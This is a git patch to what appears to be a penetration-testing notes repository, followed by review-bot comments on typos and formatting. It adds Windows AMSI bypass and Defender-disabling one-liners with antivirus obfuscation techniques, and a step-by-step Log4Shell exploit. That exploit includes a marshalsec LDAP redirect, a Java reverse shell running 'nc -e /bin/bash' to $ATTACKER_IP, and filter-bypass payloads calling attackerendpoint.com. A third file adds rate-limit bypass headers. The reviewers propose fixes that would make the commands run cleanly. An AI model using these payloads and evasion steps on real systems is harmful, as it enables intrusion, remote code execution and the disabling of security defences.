From fe64f65d51b11719e142c28479bf6dcffa7c59ea Mon Sep 17 00:00:00 2001 From: whx Date: Mon, 13 Dec 2021 23:48:07 +0100 Subject: [PATCH] log4j --- antivirus_evasion.md | 58 +++++++++++++++++++- exploit/java/log4shell.md | 85 +++++++++++++++++++++++++++++ exploit/web/bypass_rate_limiting.md | 18 ++++++ 3 files changed, 159 insertions(+), 2 deletions(-) create mode 100644 exploit/java/log4shell.md create mode 100644 exploit/web/bypass_rate_limiting.md diff --git a/antivirus_evasion.md b/antivirus_evasion.md index 233ca87..4bf3cd1 100644 --- a/antivirus_evasion.md +++ b/antivirus_evasion.md 
@@ -26,17 +26,71 @@ AMSI_RESULT_DETECTED = 32768 * [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/) * PowerShell downgrade * [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git) - +* [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py) +* [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs) * Practical example ```sh [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse Set-MpPreference -DisableRealtimeMonitoring $true ``` +* Varying string concatenation and camelCasing variations of the following string +```sh +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) +``` ### Validate -* Validate Obfuscation +* Validate Obfuscation and check which strings trigger AMSI * [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger) +```sh +.\\AMSITrigger.exe -u -f 1 +``` +or +```sh +.\\AMSITrigger.exe -i -f 1 +``` + +### Further Obfuscation + +* String concatenation +```sh +$OBF = 'Ob' + 'fu' + 's' +'cation' +``` +* `Concatenate - ('co'+'ffe'+'e')` +* `Reorder - ('{1}{0}'-f'ffee','co')` +* `Whitespace - ( 'co' +'fee' + 'e')` + +#### Type Obfuscation +* .NET has type accelerators as aliases for types to shorten them and break the signature. 
+* [idera](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell) +* [0x00-0x00](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html) +* [Documentation at microsoft](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1) + +* Example + * Without +```sh +[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6); +``` + * With +```sh +[dorkstork]::copy($buf, 0, $BufferAddress, 6); +``` + +### Automated Obfuscation + +#### Powershell +* [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) +* [Daniel's guide to Invoke-Obfuscation](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide) +```sh +Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit +``` +* [__8191 character limit__](https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation) of command prompt must not be exceeded. + +#### Other Obfuscation +* Pinpoint bytes that will be flagged with [ThreadCheck](https://github.com/rasta-mouse/ThreatCheck) + * Has to be build via VS. Will output a ddll, an excutable and an XML file. + * `ThreatCheck.exe -f ` +* [DefenderCheck](https://github.com/matterpreter/DefenderCheck) ## Links * [cmnatic](https://cmnatic.co.uk/) diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md new file mode 100644 index 0000000..1efe6ad --- /dev/null +++ b/exploit/java/log4shell.md 
@@ -0,0 +1,85 @@ +# Log4Shell + +* `log4j` < version 2.15.0rc2 +* [CVE-2021-44228](https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java) +* [log4j vulnerability tester](https://log4shell.huntress.com/) +* [List of exploitable services](https://github.com/YfryTchsGD/Log4jAttackSurface) + +* Code inside a `param` value is parsed and a `${payload}` will be executed, for example +```sh +${sys:os.name} +${sys:user.name} +${log4j:configParentLocation} +${ENV:PATH} +${ENV:HOSTNAME} +${java:version} +``` +## Java Naming and Directory Interface JNDI + +* Vulnerability can be exploited via `${jndi:ldap:///foo}` + +## POC +```sh +curl 'http://:8983/solr/admin/cores?foo=?$\{jndi:ldap://:4449\}' +``` + +## Usage + +* Fuzz endpoints to applicate the exploit +* Use HTTP header field as storage for payload as well as any other possible input field +```HTTP +X-Forwarded-For: ${jndi:ldap://:1389/foo} +``` + +* Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests` +* Java version should be the same as the one on the target +* Redirect LDAP server to HTTP server +```sh +java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit" +``` + +* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class +```sh +public class Exploit { + static { + try { + java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449"); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` +* Open reverse shell on `4449` +* `curl 'http://.10.43.243:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'` + + +## Detection + +* [Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git) +* [Vulnerable Class + Jar hashes](https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228) +* [reddit mega 
thread](https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/) +* [Yara rules](https://github.com/darkarnium/CVE-2021-44228) + +* Parse logs for `jndi` + +## Bypasses + +* Possible bypasses are as follows +```sh +${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/} +${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/} +${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/} +${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z} +${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/} +${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/} +${${::-j}ndi:rmi://attackerendpoint.com/} +``` + +## Mitgation + +* [Apache Solr security news](https://solr.apache.org/security.html) +* Add the following line to `solr.in.sh` +```toml +SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true" +``` diff --git a/exploit/web/bypass_rate_limiting.md b/exploit/web/bypass_rate_limiting.md new file mode 100644 index 0000000..a4e5ea2 --- /dev/null +++ b/exploit/web/bypass_rate_limiting.md @@ -0,0 +1,18 @@ +# Bypassing Rate Limit + +* [Infosecwriteups article](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c) +* [Anotherinfosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17) +* [Hacktricks' site](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass) + +# Usage + +* Add one of the following lines to the header in round robin +```sh +X-Originating-IP: 127.0.0.1 +X-Forwarded-For: 127.0.0.1 +X-Remote-IP: 127.0.0.1 +X-Remote-Addr: 127.0.0.1 +X-Client-IP: 127.0.0.1 +X-Host: 127.0.0.1 +X-Forwared-Host: 127.0.0.1 +```
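Review bot: In the `antivirus_evasion.md` hunk the ThreatCheck bullets are broken: the link text says `ThreadCheck` while the URL and the command say `ThreatCheck`, the command `ThreatCheck.exe -f ` has lost its argument (use an explicit placeholder such as `ThreatCheck.exe -f <file>`), and "Has to be build via VS. Will output a ddll, an excutable" should read "Has to be built via VS. Will output a DLL, an executable". The AMSITrigger and Invoke-Obfuscation commands also carry doubled backslashes (`.\\AMSITrigger.exe`, `'Token\\String\\1,2,\\Whitespace\\1'`) inside fences tagged `sh`; every snippet in this file is PowerShell, so tag the fences `powershell` and write single backslashes so the commands render as they are typed.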
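Review bot: In the `log4shell.md` hunk the Detection section says only "Parse logs for `jndi`", but the Bypasses section of the same file lists payloads in which the literal string `jndi` never appears (`${${::-j}${::-n}${::-d}${::-i}:...}`, `${${lower:j}ndi:...}`); the detection bullet should say that the nested-lookup variants listed below must be normalised or resolved before a string match, or point to the Yara rules already linked. The Mitigation section should also note that `-Dlog4j2.formatMsgNoLookups=true` only applies to log4j 2.10 and later and was later shown to be incomplete, so upgrading to a fixed release is the recommended fix rather than the flag alone. Smaller points: "Mitgation" is misspelt, "Fuzz endpoints to applicate the exploit" should read "Fuzz endpoints to locate where the exploit applies", the POC and final `curl` lines have hosts cut off (`http://:8983`, `ldap://:4449`, `.10.43.243`) and should use `$TARGET_IP`/`$ATTACKER_IP` like the rest of the file, the LDAP port is `4449` in the POC but `1389` everywhere else, and the Java class and the `solr.in.sh` line are fenced as `sh` and `toml` respectively where `java` and `sh` are the correct tags.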
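Review bot: In the `bypass_rate_limiting.md` hunk the last header is misspelt (`X-Forwared-Host` should be `X-Forwarded-Host`), so anyone copying the list would send a header that no proxy recognises. Also "Anotherinfosecwriteups article" is missing a space ("Another infosecwriteups article"), the `# Usage` heading is an H1 while the sibling file uses `## Usage`, and the header block is fenced as `sh` whereas `log4shell.md` in this same patch tags the identical kind of content `HTTP`; pick one convention for both files. Finally, the commit message "log4j" covers only one of the three files changed; a subject naming all three additions would make this patch easier to find later.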